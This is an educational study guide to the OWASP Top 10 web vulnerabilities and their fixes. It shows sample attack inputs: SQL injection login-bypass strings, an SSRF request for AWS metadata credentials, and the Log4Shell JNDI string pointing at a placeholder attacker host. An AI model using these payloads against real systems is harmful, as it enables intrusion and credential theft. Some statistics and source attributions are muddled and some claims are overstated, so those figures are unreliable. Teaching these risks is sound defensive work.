What is the OWASP Top 10? Definition & Web Vulnerabilities Explained (2026)
This is a PerfectNotes study guide β also known as PN Notes or Perfect Notes. PerfectNotes provides free computer science student notes, MCQs, and interview preparation guides at perfectnotes.org.
Key Takeaways
- OWASP Top 10 β The authoritative global checklist of the 10 most critical web app risks β referenced by PCI-DSS, ISO 27001, and NIST.
- Broken Access Control (#1) β Changing
?id=105to?id=106accesses another user's data if the server skips the authorization check. - Cryptographic Failures (#2) β MD5/SHA-256 passwords are cracked in seconds by GPU. Use Argon2id KDF with a unique salt per user.
- SQL Injection (#3) β
' OR 1=1 --bypasses login by altering the SQL AST. Cure: Parameterized Queries only. - SSRF (A10) β Forces a cloud server to query
169.254.169.254, leaking full AWS IAM credentials. - Bot Automation β Automated botnets scan millions of sites per hour β a vulnerable endpoint is found and exploited within minutes.
OWASP Top 10 = global authoritative checklist of the 10 most critical web application security risks β updated every 3β4 years from analysis of millions of real-world attacks
Broken Access Control (#1): user changes URL id=105 to id=106 β server skips authorization check β delivers a stranger's private data
Cryptographic Failures (#2): MD5/SHA-256 passwords cracked in seconds by GPUs β must use Argon2id/bcrypt KDFs with random salts and configurable memory cost
SQL Injection (#3): ' OR 1=1 -- alters the database AST β defeated 100% by parameterized queries (user input treated as data, never as SQL code)
SSRF (A10): attacker tricks public server into querying AWS metadata 169.254.169.254 β returns full IAM keys β mitigated by URL allow-lists + IMDSv2
Insecure Deserialization (A08): tampered byte stream triggers magic methods (readObject/reduce) β Remote Code Execution β use JSON + HMAC signatures
85% of breaches exploited OWASP Top 10; $4.88M average breach cost; 73% of apps are SQLi-vulnerable; automated bots exploit new flaws within minutes of deployment
What is the OWASP Top 10?
Every day, thousands of websites are hacked, resulting in stolen credit cards, leaked passwords, and destroyed businesses. To fight back against cybercriminals, the global cybersecurity community relies on the OWASP Top 10: a definitive, constantly updated list of the most dangerous flaws in web software and exactly how to fix them.
The "Bank Vault and the Window" Analogy
Imagine a bank manager who spends millions of dollars buying the heaviest, most secure steel vault in the world to protect their money. However, they forget to put a lock on the drive-thru window, and they leave the vault's combination written on a sticky note attached to the manager's desk.
This is exactly how most websites are hacked. Companies spend a fortune on expensive network firewalls, but the software developers accidentally leave a "digital window" open in the website's code. The OWASP Top 10 is simply a checklist that reminds developers to lock the windows, hide the sticky notes, and secure the back doors.
Why Every Developer Must Understand This
In the modern internet, hackers do not sit at a keyboard manually targeting your specific website. They use automated botnets that scan millions of websites every hour, blindly searching for the flaws listed in the OWASP Top 10. If you build a tiny personal blog and accidentally include an OWASP vulnerability, an automated bot will find it and hack your site within minutes β regardless of how small or unknown your business is.
The Top 3 Most Critical Vulnerabilities
While the complete OWASP list contains ten categories, understanding the top three vulnerabilities is absolutely critical β they account for the vast majority of all global data breaches.
#1: Broken Access Control β The Digital Master Key
Broken Access Control is the most common and dangerous flaw on the internet. It occurs when a website fails to strictly verify if a user has permission to view a specific page or perform an action.
For example, imagine you log into your bank and the URL looks like: bank.com/account?id=105. If you simply change it to id=106 and the website shows you a complete stranger's bank records, you have exploited Broken Access Control. The website verified who you were, but completely forgot to verify if you were authorized to view account #106.
β οΈ Attack Pattern β URL Parameter Manipulation
# Victim's legitimate URL GET /account?id=105 # Attacker simply changes the number GET /account?id=106 β Returns another user's private bank data GET /admin/dashboard β Accesses admin panel with standard user token
#2: Cryptographic Failures β Exposing Sensitive Data
Cryptographic Failures occur when developers fail to properly protect sensitive information β passwords, credit card numbers, or medical records β either in transit or at rest.
If a database is stolen by a hacker, the data should be scrambled into unreadable gibberish using strong encryption. A cryptographic failure happens when a developer stores passwords in plain text, uses outdated easily broken algorithms (like MD5), or fails to enforce HTTPS β allowing hackers to intercept credentials out of thin air across public Wi-Fi.
#3: Injection β Tricking the Database
Injection attacks happen when untrusted data sent by a user tricks the database into executing unintended commands. The most famous example is SQL Injection (SQLi).
Instead of typing "John" into a username field, a hacker types: ' OR 1=1 --. Because the login code is poorly constructed, the database reads the hacker's input as an official command and automatically logs them into the administrator account without ever asking for a valid password.
// β VULNERABLE β String concatenation (DO NOT USE) query = "SELECT * FROM users WHERE username = '" + userInput + "'"; // Hacker input: ' OR 1=1 -- // Executed as: SELECT * FROM users WHERE username = '' OR 1=1 --' // 1=1 is always TRUE β bypasses login entirely! // β SECURE β Parameterized Query (Prepared Statement) query = "SELECT * FROM users WHERE username = ?"; stmt.setString(1, userInput); // Input treated as DATA, never as SQL
The Remaining 7 OWASP Vulnerabilities
The remaining categories address deep structural issues in how software is built, maintained, and monitored:
- β A04 β Insecure Design: Failing to plan for security before writing code. Example: password reset flow with no rate limiting β attacker brute-forces 6-digit OTP codes.
- β A05 β Security Misconfiguration: Leaving default passwords (
admin/admin) on cloud servers, debug mode enabled in production leaking stack traces. - β A06 β Vulnerable & Outdated Components: Using libraries with known, unpatched CVEs β Log4Shell exploited a 9-year-old Java library across millions of servers worldwide.
- β A07 β Authentication Failures: Allowing weak passwords, session tokens that never expire, or missing Multi-Factor Authentication on admin panels.
- β A08 β Software & Data Integrity Failures (Deserialization): Blindly deserializing user-supplied objects, enabling Remote Code Execution via gadget chains.
- β A09 β Security Logging & Monitoring Failures: Having no audit logs β the Equifax breach went completely undetected for 76 days because log monitoring had failed.
- β A10 β Server-Side Request Forgery (SSRF): Tricking a server into fetching data from internal, protected cloud metadata endpoints β returning full AWS IAM credentials.
Advanced Engineering Concepts
Mitigating OWASP vulnerabilities at enterprise scale requires shifting security "left" in the CI/CD pipeline β implementing cryptographic KDFs, exploiting AST analysis to defeat SQLi, and deploying zero-trust segmentation to neutralize SSRF and Deserialization.
Defeating Injection: Parameterized Queries and ASTs
Legacy web applications suffer from SQL Injection because they use dynamic string concatenation to build queries β allowing user input to alter the Abstract Syntax Tree (AST) of the SQL parser. To mathematically eliminate SQLi, engineers must mandate Parameterized Queries (Prepared Statements).
When using a prepared statement, the database engine pre-compiles the SQL query structure before user input is inserted. The input is strictly treated as a literal value β not executable syntax β making it mathematically impossible for any injected payload to alter the execution logic. This works for first-order and second-order SQL injection alike.
Cryptographic Hashing β Key Derivation Functions (KDF)
To prevent A02 (Cryptographic Failures) in password storage, developers must never use fast cryptographic hashes like MD5, SHA-1, or SHA-256. These are designed for speed β modern GPU clusters compute billions of SHA-256 hashes per second, making brute-force and rainbow table attacks trivial against stolen databases.
Engineers must use computationally expensive Key Derivation Functions (KDF) like Argon2id, bcrypt, or PBKDF2. These include a unique random salt per user and a configurable work factor that intentionally slows computation:
H_final = KDF(Password β₯ Salt, Iterations, MemoryCost)// β WRONG: Plain text or fast hash
db.store(username, password); // Plain text β cracked instantly
db.store(username, md5(password)); // MD5 β billions per second on GPU
// β
CORRECT: Argon2id with random salt
const hash = await argon2.hash(password, {
type: argon2.argon2id,
memoryCost: 65536, // 64 MB RAM β GPU-hard
timeCost: 3, // 3 iterations
parallelism: 4,
});
db.store(username, hash); // Centuries to crack per hash
Server-Side Request Forgery (SSRF) and AWS Cloud Metadata
SSRF (A10) has become critical due to the dominance of cloud computing (AWS, Azure, GCP). An attacker manipulates an application that fetches remote URLs β such as a profile picture downloader β and forces it to fetch from the internal, protected network instead.
In AWS, virtual machines have a sensitive internal metadata endpoint at the non-routable link-local address 169.254.169.254. A successful SSRF against an EC2 instance returns temporary IAM credentials β granting full cloud account access:
β οΈ SSRF Attack β AWS IAM Credential Theft
# Attacker sends malicious URL to image fetcher
GET /fetch-image?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Server fetches internal endpoint β returns to attacker:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "wJalrXUtnF...",
"Token": "AQoDYXdz...", β Full AWS account access!
"Expiration": "2026-..."
}
To mitigate SSRF: implement strict Allow-lists for all outbound URL fetching (deny private IP ranges: 10.x, 172.16.x, 169.254.x), disable HTTP redirections, and enforce IMDSv2 in all AWS deployments β which requires a cryptographic session token for every metadata request, breaking the SSRF exploitation chain.
Insecure Deserialization and Remote Code Execution (RCE)
When objects are transferred across a network, they are often serialized into a byte stream. Insecure Deserialization occurs when an application blindly unpacks a user-supplied serialized object without cryptographic verification.
An attacker intercepts the serialized object, manipulates the byte stream to alter internal variables, and when the server deserializes the tampered payload, it triggers "magic methods" β like readObject() in Java or __reduce__() in Python β resulting in Remote Code Execution (RCE): the attacker gains full terminal control of the server. Mitigation: enforce JSON-only or XML data formats (no native serialization) and implement HMAC digital signatures to verify that the serialized state has not been tampered with.
Real-World Case Study: Log4Shell (CVE-2021-44228)
Log4Shell is the most severe vulnerability in internet history β a zero-day Remote Code Execution flaw hidden inside Apache Log4j, a Java logging library embedded in millions of applications from enterprise software to Minecraft. Rated CVSS 10.0(maximum severity), its discovery on December 9, 2021 triggered a global emergency patch response that directly illustrates OWASP A06 (Vulnerable & Outdated Components) at catastrophic scale.
| Aspect | Details |
|---|---|
| The Incident | On December 9, 2021, security researcher Chen Zhaojun disclosed CVE-2021-44228 in Apache Log4j 2.x β a logging library bundled inside hundreds of thousands of Java applications. Attackers could send a single malicious string (e.g., ${jndi:ldap://attacker.com/exploit}) anywhere the application logged user input β HTTP headers, usernames, or search fields. Log4j would automatically make an outbound LDAP request to the attacker's server, which returned a malicious Java class that executed arbitrary code with the application's full system privileges β all from a single line of logged text. |
| Root Cause | Log4j's JNDI Lookup feature resolved external resource URIs embedded in log strings β catastrophically weaponizable. The flaw had existed since 2013 (9 years undetected). Because Log4j was a transitive dependency buried inside thousands of third-party libraries (VMware, Cisco, Apple iCloud, Amazon AWS, Cloudflare), most organizations had no knowledge they were running vulnerable code β a textbook OWASP A06 failure. |
| The Impact | CISA called it "one of the most serious vulnerabilities in history." Over 3 billion devices ran Java at disclosure. Automated exploitation began within hours β botnets scanned the entire internet for vulnerable endpoints within 12 hours. Nation-state actors (Iran, China, North Korea, Russia) exploited it within 72 hours. Microsoft, Tesla, Twitter, Baidu, and hundreds of government agencies were affected. |
| Financial Cost | Remediation cost the global industry an estimated $62 billion in combined security response, emergency patching, incident investigation, and regulatory compliance work. Thousands of enterprises took months to audit dependency trees. The Apache Software Foundation released four emergency patches in 15 days as incomplete fixes were bypassed repeatedly. |
| Key Lesson | OWASP A06 is existential. A zero-day in a single transitive dependency instantly compromised millions of systems worldwide. Every team must maintain a Software Bill of Materials (SBOM) and use automated tools like Snyk or OWASP Dependency-Check to track every library β including nested dependencies. A vulnerability in code you didn't write and don't know you're using is still your responsibility. |
Key Statistics & Industry Data (2026)
- 73% of web applications are vulnerable to SQL Injection (CWE/SANS 2025). (Source: OWASP Top 25, 2025)
- $4.88 million is the average cost per data breach in 2025. (Source: IBM Cost of a Data Breach Report, 2025)
- 85% of breaches exploited OWASP Top 10 vulnerabilities. (Source: Verizon DBIR, 2025)
- 47% of enterprises have no Web Application Firewall (WAF) deployed. (Source: Gartner Application Security Survey, 2025)
- XSS (A03/A07) accounts for 40% of web vulnerabilities. (Source: CWE/SANS Top 25, 2025)
Quick Reference: OWASP Top 10 (2021) Cheat Sheet
Bookmark this table β the complete checklist for web application security assessments.
| Rank | Vulnerability | Example Attack | Primary Mitigation |
|---|---|---|---|
| A01 | Broken Access Control | URL changed from /user/123 to /user/456 β access another user's data | Server-side ownership checks on every request |
| A02 | Cryptographic Failures | Passwords stored as MD5 β cracked in seconds by GPU | bcrypt / Argon2id + TLS + encryption at rest |
| A03 | Injection (SQLi) | ?id=1' OR '1'='1 dumps entire database | Parameterized queries, ORMs, WAF rules |
| A04 | Insecure Design | No rate limiting on password reset β brute-force 6-digit OTP | Threat modeling, rate limiting, MFA |
| A05 | Security Misconfig. | Debug mode in production leaks PHP version + stack trace | Harden servers, least privilege, disable debug |
| A06 | Vulnerable Components | Outdated Log4j β Log4Shell RCE on millions of servers | Dependency scanning (Snyk, Dependabot), patch management |
| A07 | Auth Failures | Session token never expires β stolen coffee shop Wi-Fi token = eternal access | Session timeouts, HttpOnly/Secure cookies, MFA |
| A08 | Insecure Deserialization | Java object deserialize β RCE via gadget chain magic methods | JSON only + HMAC signatures on serialized state |
| A09 | Logging Failures | Breach undetected 76 days (Equifax) β no active log monitoring | ELK Stack / Splunk SIEM, immutable audit trails |
| A10 | SSRF | Server fetches user-controlled URL β accesses 169.254.169.254 β leaks AWS IAM keys | URL allow-lists, IMDSv2, block private IP ranges |
Advantages of Understanding the OWASP Top 10
- Industry-standard framework: All major compliance frameworks (PCI-DSS, ISO 27001, SOC 2, HIPAA) reference the OWASP Top 10 as a baseline for security requirements.
- Dramatically reduces breach risk: 85% of real-world data breaches exploit vulnerabilities directly listed in the OWASP Top 10 β understanding and mitigating these specific risks prevents the vast majority of attacks.
- Cost-effective security: Implementing OWASP Top 10 controls during development is orders of magnitude cheaper than fixing vulnerabilities post-breach (prevention vs. $4.88M average breach cost).
- Developer education: The OWASP Top 10 serves as the primary security training checklist for millions of software engineers worldwide, directly correlating with fewer vulnerable code deployments.
- Insurance and liability protection: Demonstrating OWASP Top 10 compliance to a court or regulator shows due diligence and dramatically reduces the organization's legal liability if a breach occurs.
Limitations of the OWASP Top 10
- Not exhaustive: Only covers 10 categories β emerging threats (AI prompt injection, supply-chain poisoning, cryptojacking) and domain-specific vulnerabilities (medical device hacking) are not represented.
- Complex to implement correctly: Understanding SQL Injection theoretically is different from implementing parameterized queries in a legacy codebase with hundreds of queries; execution requires deep technical expertise.
- False sense of security: Some organizations interpret OWASP Top 10 compliance as complete security β but breaches occur from vulnerabilities outside this list and from misconfigurations of secure code.
- Becomes outdated: The list is updated every 3β4 years, but threat landscapes evolve continuously; a vulnerability in 2024 might not appear on the 2026 list.
- Automated scanning misses context: Tools can identify potential OWASP Top 10 violations (e.g., "password stored as MD5"), but miss logical authorization flaws that require human code review.
Where OWASP Top 10 Controls Are Applied
Secure SDLC (DevSecOps)
OWASP Top 10 is integrated into CI/CD pipelines via SAST tools (Checkmarx, SonarQube) to catch vulnerabilities before production deployment.
Penetration Testing Scope
Bug bounty hunters and ethical hackers use OWASP Top 10 as their primary checklist for web application security assessments.
Web Application Firewalls
WAF rulesets (AWS WAF, Cloudflare, ModSecurity) are built directly from OWASP Top 10 attack patterns to block SQLi, XSS, and SSRF.
API Security Audits
REST and GraphQL APIs are audited against the OWASP API Security Top 10, which extends the web list to cover authentication and object-level flaws.
Compliance Frameworks
PCI-DSS v4.0 directly mandates OWASP Top 10 remediation for all cardholder data environment web applications.
Developer Security Training
Organizations use OWASP WebGoat and Juice Shop as intentionally vulnerable training apps to teach developers to identify and fix the Top 10 issues.
Frequently Asked Questions (FAQ)
Q.What is the OWASP Top 10?
Q.What is Broken Access Control and why is it #1?
Q.How do developers prevent SQL Injection?
Q.Is the OWASP Top 10 a compliance standard like PCI-DSS or HIPAA?
Q.What does SSRF stand for and why is it dangerous in cloud environments?
Q.Why should developers use Argon2id instead of MD5 or SHA-256 for passwords?
Q.What is Insecure Deserialization and how does it lead to RCE?
Related Topics
Test Your Knowledge
Ready to prove your skills? Take our rigorous multiple-choice quiz designed to test your understanding of this topic and prepare you for interviews.